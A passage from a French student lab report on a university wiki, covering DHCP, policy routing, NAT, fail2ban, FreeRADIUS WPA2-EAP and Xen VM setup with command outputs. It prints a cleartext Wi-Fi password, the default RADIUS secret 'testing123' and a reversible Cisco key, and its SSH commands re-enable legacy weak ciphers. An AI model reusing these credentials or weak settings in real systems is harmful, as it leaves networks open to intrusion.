=== Configuration DHCP sur les routeurs ===&lt;br /&gt;
Sur '''E304''' (plage 100‑150) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 10.60.15.1 10.60.15.99&lt;br /&gt;
ip dhcp excluded-address 10.60.15.151 10.60.15.254&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool SALHI_VLAN25&lt;br /&gt;
 network 10.60.15.0 255.255.255.0&lt;br /&gt;
 default-router 10.60.15.1&lt;br /&gt;
 dns-server 192.168.20.2 8.8.8.8&lt;br /&gt;
 domain-name msalhi.online&lt;br /&gt;
 lease 0 12&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Policy‑Based Routing (PBR) ===&lt;br /&gt;
Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip access-list extended TRAFIC_VLAN25&lt;br /&gt;
 permit ip 10.60.15.0 0.0.0.255 any&lt;br /&gt;
!&lt;br /&gt;
route-map PBR_VLAN25 permit 10&lt;br /&gt;
 match ip address TRAFIC_VLAN25&lt;br /&gt;
 set ip next-hop 193.48.57.167&lt;br /&gt;
!&lt;br /&gt;
interface Vlan25&lt;br /&gt;
 ip policy route-map PBR_VLAN25&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests ===&lt;br /&gt;
Un client connecté au SSID &amp;lt;code&amp;gt;VM_SERVICES_15&amp;lt;/code&amp;gt; obtient une adresse IP dans la plage DHCP (ex. &amp;lt;code&amp;gt;10.60.15.101&amp;lt;/code&amp;gt;), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (&amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
= Vérifications et tests =&lt;br /&gt;
&lt;br /&gt;
Cette section regroupe l’ensemble des commandes exécutées pour valider le bon fonctionnement de chaque composant de l’infrastructure. Les sorties sont présentées telles qu’obtenues sur les machines concernées.&lt;br /&gt;
&lt;br /&gt;
== Services Web ==&lt;br /&gt;
&lt;br /&gt;
=== Sur Moon (machine de services) ===&lt;br /&gt;
Vérification de l’écoute Apache sur les ports 80 et 443 :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ss -tlnp | grep -E ':80|:443'&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
LISTEN 0      128                                          *:80              *:*    users:((&amp;quot;apache2&amp;quot;,pid=16838,fd=4),(&amp;quot;apache2&amp;quot;,pid=16837,fd=4),(&amp;quot;apache2&amp;quot;,pid=7274,fd=4))&lt;br /&gt;
LISTEN 0      128                                          *:443             *:*    users:((&amp;quot;apache2&amp;quot;,pid=16838,fd=6),(&amp;quot;apache2&amp;quot;,pid=16837,fd=6),(&amp;quot;apache2&amp;quot;,pid=7274,fd=6))&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test d’accès HTTPS en local (IPv6) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
curl -6 https://msalhi.online -I&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Fri, 27 Feb 2026 11:04:38 GMT&lt;br /&gt;
Server: Apache/2.4.66 (Debian)&lt;br /&gt;
Strict-Transport-Security: max-age=63072000; includeSubDomains&lt;br /&gt;
X-Frame-Options: DENY&lt;br /&gt;
X-Content-Type-Options: nosniff&lt;br /&gt;
X-XSS-Protection: 1; mode=block&lt;br /&gt;
Last-Modified: Fri, 06 Feb 2026 20:23:53 GMT&lt;br /&gt;
ETag: &amp;quot;1515-64a2d916615c9&amp;quot;&lt;br /&gt;
Accept-Ranges: bytes&lt;br /&gt;
Content-Length: 5397&lt;br /&gt;
Vary: Accept-Encoding&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sur Solstice (machine mandataire) ===&lt;br /&gt;
Test d’accès HTTPS via le proxy inverse (IPv4) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
curl -4 https://msalhi.online -I&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Fri, 27 Feb 2026 11:04:55 GMT&lt;br /&gt;
Server: Apache/2.4.66 (Debian)&lt;br /&gt;
Strict-Transport-Security: max-age=63072000; includeSubDomains&lt;br /&gt;
X-Frame-Options: DENY&lt;br /&gt;
X-Content-Type-Options: nosniff&lt;br /&gt;
X-XSS-Protection: 1; mode=block&lt;br /&gt;
Last-Modified: Fri, 06 Feb 2026 20:23:53 GMT&lt;br /&gt;
ETag: &amp;quot;1515-64a2d916615c9&amp;quot;&lt;br /&gt;
Accept-Ranges: bytes&lt;br /&gt;
Content-Length: 5397&lt;br /&gt;
Vary: Accept-Encoding&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vérification des règles NAT :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -L POSTROUTING -n -v&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Chain POSTROUTING (policy ACCEPT 8219 packets, 528K bytes)&lt;br /&gt;
 pkts bytes target     prot opt in     out     source               destination         &lt;br /&gt;
18528 1577K MASQUERADE  0    --  *      eth1    0.0.0.0/0            0.0.0.0/0           &lt;br /&gt;
 3254  225K MASQUERADE  0    --  *      eth0    10.60.15.0/24        0.0.0.0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La première règle assure la mascarade pour tout le trafic sortant sur l’interface publique (eth1). La seconde règle (source 10.60.15.0/24 sortant sur eth0) est résiduelle mais ne perturbe pas le fonctionnement.&lt;br /&gt;
&lt;br /&gt;
== fail2ban ==&lt;br /&gt;
&lt;br /&gt;
=== Sur Solstice ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
fail2ban-client status sshd&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Status for the jail: sshd&lt;br /&gt;
|- Filter&lt;br /&gt;
|  |- Currently failed:	0&lt;br /&gt;
|  |- Total failed:	12792&lt;br /&gt;
|  `- File list:	/var/log/auth.log&lt;br /&gt;
`- Actions&lt;br /&gt;
   |- Currently banned:	4&lt;br /&gt;
   |- Total banned:	3114&lt;br /&gt;
   `- Banned IP list:	134.199.155.127 162.243.33.174 152.42.166.201 206.189.90.119&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sur Moon ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
fail2ban-client status sshd&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Status for the jail: sshd&lt;br /&gt;
|- Filter&lt;br /&gt;
|  |- Currently failed:	0&lt;br /&gt;
|  |- Total failed:	1&lt;br /&gt;
|  `- File list:	/var/log/auth.log&lt;br /&gt;
`- Actions&lt;br /&gt;
   |- Currently banned:	0&lt;br /&gt;
   |- Total banned:	0&lt;br /&gt;
   `- Banned IP list:	&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== WPA2‑EAP – FreeRADIUS (sur Moon) ==&lt;br /&gt;
Statut du service :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
systemctl status freeradius&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
● freeradius.service - FreeRADIUS multi-protocol policy server&lt;br /&gt;
   Loaded: loaded (/lib/systemd/system/freeradius.service; enabled)&lt;br /&gt;
   Active: active (running) since ...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test d’authentification local :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
radtest msalhi WifiSecure2026! localhost 1812 testing123&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76&lt;br /&gt;
	User-Name = &amp;quot;msalhi&amp;quot;&lt;br /&gt;
	User-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
	NAS-IP-Address = 127.0.0.1&lt;br /&gt;
	NAS-Port = 0&lt;br /&gt;
	Message-Authenticator = 0x00&lt;br /&gt;
	Cleartext-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration du client RADIUS (point d’accès) extraite de &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client vlan1_ap1 {&lt;br /&gt;
    ipaddr = 172.27.0.4&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap1-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
client vlan1_ap2 {&lt;br /&gt;
    ipaddr = 172.27.0.3&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap2-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== WPA2‑EAP – Point d’accès (wifi‑E304) ==&lt;br /&gt;
Connexion SSH (commande adaptée) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vérification du SSID et de son VLAN :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show dot11 ssid VM_SERVICES_15&lt;br /&gt;
SSID Name                : VM_SERVICES_15&lt;br /&gt;
Status                   : Enabled&lt;br /&gt;
Broadcast SSID           : Enabled&lt;br /&gt;
VLAN                     : 25&lt;br /&gt;
Authentication Methods   : Open EAP, Network-EAP&lt;br /&gt;
WPA Key Management       : WPA2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vérification des serveurs RADIUS configurés :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show running-config | include radius-server&lt;br /&gt;
radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key 7 044F0E151B284249584B56&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Statistiques RADIUS :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show aaa servers&lt;br /&gt;
RADIUS: id 7, priority 6, host 192.168.20.2, auth-port 1812, acct-port 1813&lt;br /&gt;
     State: current UP, duration 794495s&lt;br /&gt;
     Authen: request 2076, timeouts 1646&lt;br /&gt;
             Transaction: success 430, failure 411&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test d’authentification :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#test aaa group radius_student25 msalhi WifiSecure2026! legacy&lt;br /&gt;
Attempting authentication test to server-group radius_student25 using radius&lt;br /&gt;
User was successfully authenticated.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Clients associés :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show dot11 associations&lt;br /&gt;
802.11 Client Stations on Dot11Radio1: &lt;br /&gt;
SSID [VM_SERVICES_15] : &lt;br /&gt;
MAC Address    IP address      Device        Name            Parent         State     &lt;br /&gt;
a0b3.395a.dcc8 10.60.15.153    unknown       -               self           EAP-Assoc&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
État du VLAN 25 sur l’AP :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show vlan 25&lt;br /&gt;
Virtual LAN ID:  25 (IEEE 802.1Q Encapsulation)&lt;br /&gt;
   vLAN Trunk Interfaces:  Dot11Radio0.25, Dot11Radio1.25, GigabitEthernet0.25&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== WPA2‑EAP – Routeur central (C9200‑E304) ==&lt;br /&gt;
Connexion SSH (commande adaptée) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vérification du VLAN 25 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show vlan brief | include 25&lt;br /&gt;
25   E15-MSalhi                       active&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Interface VLAN 25 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show ip interface brief | include Vlan25&lt;br /&gt;
Vlan25                 10.60.15.2      YES manual up                    up&lt;br /&gt;
C9200-E304#show ipv6 interface brief | include Vlan25&lt;br /&gt;
Vlan25                 [up/up]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
VRRP pour VLAN 25 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show vrrp brief | include 25&lt;br /&gt;
Vl25                25 IPv4 110     0  N   Y  MASTER  10.60.15.2(local) 10.60.15.1&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show vrrp Vlan25&lt;br /&gt;
Vlan25 - Group 25 - Address-Family IPv4&lt;br /&gt;
  State is MASTER&lt;br /&gt;
  Virtual IP address is 10.60.15.1&lt;br /&gt;
  Priority is 110&lt;br /&gt;
  Master Router is 10.60.15.2 (local)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
DHCP :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show ip dhcp pool&lt;br /&gt;
...&lt;br /&gt;
Pool PoolSalhi :&lt;br /&gt;
 Utilization mark (high/low)    : 100 / 0&lt;br /&gt;
 Total addresses                : 254&lt;br /&gt;
 Leased addresses               : 1&lt;br /&gt;
 Excluded addresses             : 150&lt;br /&gt;
 Current index        IP address range                    Leased/Excluded/Total&lt;br /&gt;
 10.60.15.156         10.60.15.1       - 10.60.15.254      1     / 150   / 254&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show ip dhcp binding | include 10.60.15&lt;br /&gt;
10.60.15.153    ff39.5adc.c800.0100.    Feb 27 2026 08:59 PM    Automatic  Active     Vlan25&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Policy‑Based Routing (PBR) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show route-map PBR_VLAN25&lt;br /&gt;
route-map PBR_VLAN25, permit, sequence 10&lt;br /&gt;
  Match clauses:&lt;br /&gt;
    ip address (access-lists): TRAFIC_VLAN25 &lt;br /&gt;
  Set clauses:&lt;br /&gt;
    ip next-hop 193.48.57.167&lt;br /&gt;
  Policy routing matches: 3128 packets, 1082288 bytes&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show ip access-lists TRAFIC_VLAN25&lt;br /&gt;
Extended IP access list TRAFIC_VLAN25&lt;br /&gt;
    10 permit ip 10.60.15.0 0.0.0.255 any (3128 matches)&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show ip policy&lt;br /&gt;
Interface      Route map&lt;br /&gt;
Vlan25         PBR_VLAN25&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Trunk vers le point d’accès :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show interfaces trunk&lt;br /&gt;
Port        Mode             Encapsulation  Status        Native vlan  &lt;br /&gt;
Gi1/0/1     on               802.1q         trunking      1&lt;br /&gt;
&lt;br /&gt;
Port        Vlans allowed and active in management domain&lt;br /&gt;
Gi1/0/1     1-2,11-12,15-16,19-20,23-25,28,530&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show interfaces GigabitEthernet1/0/1 switchport&lt;br /&gt;
Name: Gi1/0/1&lt;br /&gt;
Switchport: Enabled&lt;br /&gt;
Administrative Mode: trunk&lt;br /&gt;
Operational Mode: trunk&lt;br /&gt;
Trunking VLANs Enabled: ALL&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Réseau basique et avancé ==&lt;br /&gt;
&lt;br /&gt;
Routes sur E304 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show ip route | include 10.60.15&lt;br /&gt;
C        10.60.15.0/24 is directly connected, Vlan25&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show ip route 0.0.0.0&lt;br /&gt;
Gateway of last resort is 193.48.57.162 to network 0.0.0.0&lt;br /&gt;
O*E2  0.0.0.0/0 [110/1] via 193.48.57.162, Vlan2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connectivité depuis Moon vers la passerelle VLAN 25 :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ping -c 3 10.60.15.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
PING 10.60.15.1 (10.60.15.1) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.15.1: icmp_seq=1 ttl=253 time=1.35 ms&lt;br /&gt;
64 bytes from 10.60.15.1: icmp_seq=2 ttl=253 time=2.09 ms&lt;br /&gt;
64 bytes from 10.60.15.1: icmp_seq=3 ttl=253 time=1.17 ms&lt;br /&gt;
&lt;br /&gt;
--- 10.60.15.1 ping statistics ---&lt;br /&gt;
3 packets transmitted, 3 received, 0% packet loss, time 2003ms&lt;br /&gt;
rtt min/avg/max/mdev = 1.171/1.536/2.091/0.398 ms&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
= Conclusion =&lt;br /&gt;
L’infrastructure déployée répond à toutes les exigences du projet :&lt;br /&gt;
* Virtualisation Xen avec séparation des rôles (services / mandataire)&lt;br /&gt;
* Services sécurisés : SSH redirigé, DNS maître/esclave avec DNSSEC, HTTPS avec certificat Gandi, proxy inverse IPv4&lt;br /&gt;
* Filtrage des attaques par fail2ban&lt;br /&gt;
* Réseau redondant avec VRRP, DHCP, et Policy‑Based Routing&lt;br /&gt;
* WiFi sécurisé par WPA2‑EAP avec FreeRADIUS&lt;br /&gt;
* Tests d’intrusion concluants sur WEP et WPA2‑PSK&lt;br /&gt;
* Chiffrement de données avec LUKS&lt;br /&gt;
&lt;br /&gt;
L’ensemble est fonctionnel et démontre une maîtrise des technologies mises en œuvre.&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12501</id>
		<title>Atelier SysRes SE4 2025/2026 E15</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12501"/>
		<updated>2026-02-27T12:54:13Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Effraction WiFi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&amp;lt;div class=&amp;quot;titlepage&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div class=&amp;quot;figure&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:polytech_logo.png|image]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
'''Rapport de Projet SE4 IdO'''                                                                                             '''Année Universitaire 2025-2026'''&lt;br /&gt;
&lt;br /&gt;
'''Étudiant: Mohamed SALHI'''                                                           '''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''&lt;br /&gt;
&lt;br /&gt;
'''Domaine: &amp;lt;code&amp;gt;msalhi.online&amp;lt;/code&amp;gt;'''&lt;br /&gt;
&amp;lt;/div&amp;gt;&amp;lt;span id=&amp;quot;introduction&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.&lt;br /&gt;
&lt;br /&gt;
L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :&lt;br /&gt;
&lt;br /&gt;
* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs&lt;br /&gt;
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse&lt;br /&gt;
* Une infrastructure réseau redondante avec routeurs Cisco C9200&lt;br /&gt;
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;atelier-système-et-réseau---machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Atelier système et réseau - Machines virtuelles =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;création-des-machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Création des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 &amp;lt;code&amp;gt;capbreton.plil.info&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;commandes-de-création&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Commandes de création ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création de la machine de services SE4.Moon&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
# Création de la machine mandataire SE4.Solstice&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;démarrage-et-connexion&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Démarrage et connexion ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Démarrage des VMs&lt;br /&gt;
xen create /etc/xen/SE4.Moon.cfg&lt;br /&gt;
xen create /etc/xen/SE4.Solstice.cfg&lt;br /&gt;
&lt;br /&gt;
# Connexion aux consoles&lt;br /&gt;
xen console SE4.Moon&lt;br /&gt;
xen console SE4.Solstice&lt;br /&gt;
&lt;br /&gt;
# Liste des VMs actives&lt;br /&gt;
root@capbreton:~# xen list&lt;br /&gt;
Name                                        ID   Mem VCPUs    State   Time(s)&lt;br /&gt;
SE4.Solstice                                39  2048     1     -b----    2560.1&lt;br /&gt;
SE4.Moon                                   119  2048     1     -b----     452.3&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-de-services-se4.moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine de services (SE4.Moon) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;montage-des-partitions-lvm-pour-var-et-home&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Montage des partitions LVM pour /var et /home ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création des fichiers de partition sur le Dom0&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual&lt;br /&gt;
&lt;br /&gt;
# Modification du fichier de configuration Xen&lt;br /&gt;
disk = [&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.home,xvdb,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.var,xvdc,w',&lt;br /&gt;
]&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;formatage-et-montage-des-partitions&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Formatage et montage des partitions ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Formatage des partitions&lt;br /&gt;
mkfs -t ext4 /dev/xvdb&lt;br /&gt;
mkfs -t ext4 /dev/xvdc&lt;br /&gt;
&lt;br /&gt;
# Montage temporaire et copie des données&lt;br /&gt;
mount /dev/xvdc /mnt&lt;br /&gt;
mv /var/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
mount /dev/xvdb /mnt&lt;br /&gt;
mv /home/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
# Configuration du fstab&lt;br /&gt;
cat &amp;gt; /etc/fstab &amp;lt;&amp;lt; EOF&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvdb /home ext4 defaults 0 2&lt;br /&gt;
/dev/xvdc /var ext4 defaults 0 2&lt;br /&gt;
EOF&lt;br /&gt;
&lt;br /&gt;
# Application des modifications&lt;br /&gt;
mount -a&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface réseau privée (vers Solstice)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.2/24&lt;br /&gt;
    gateway 192.168.20.1&lt;br /&gt;
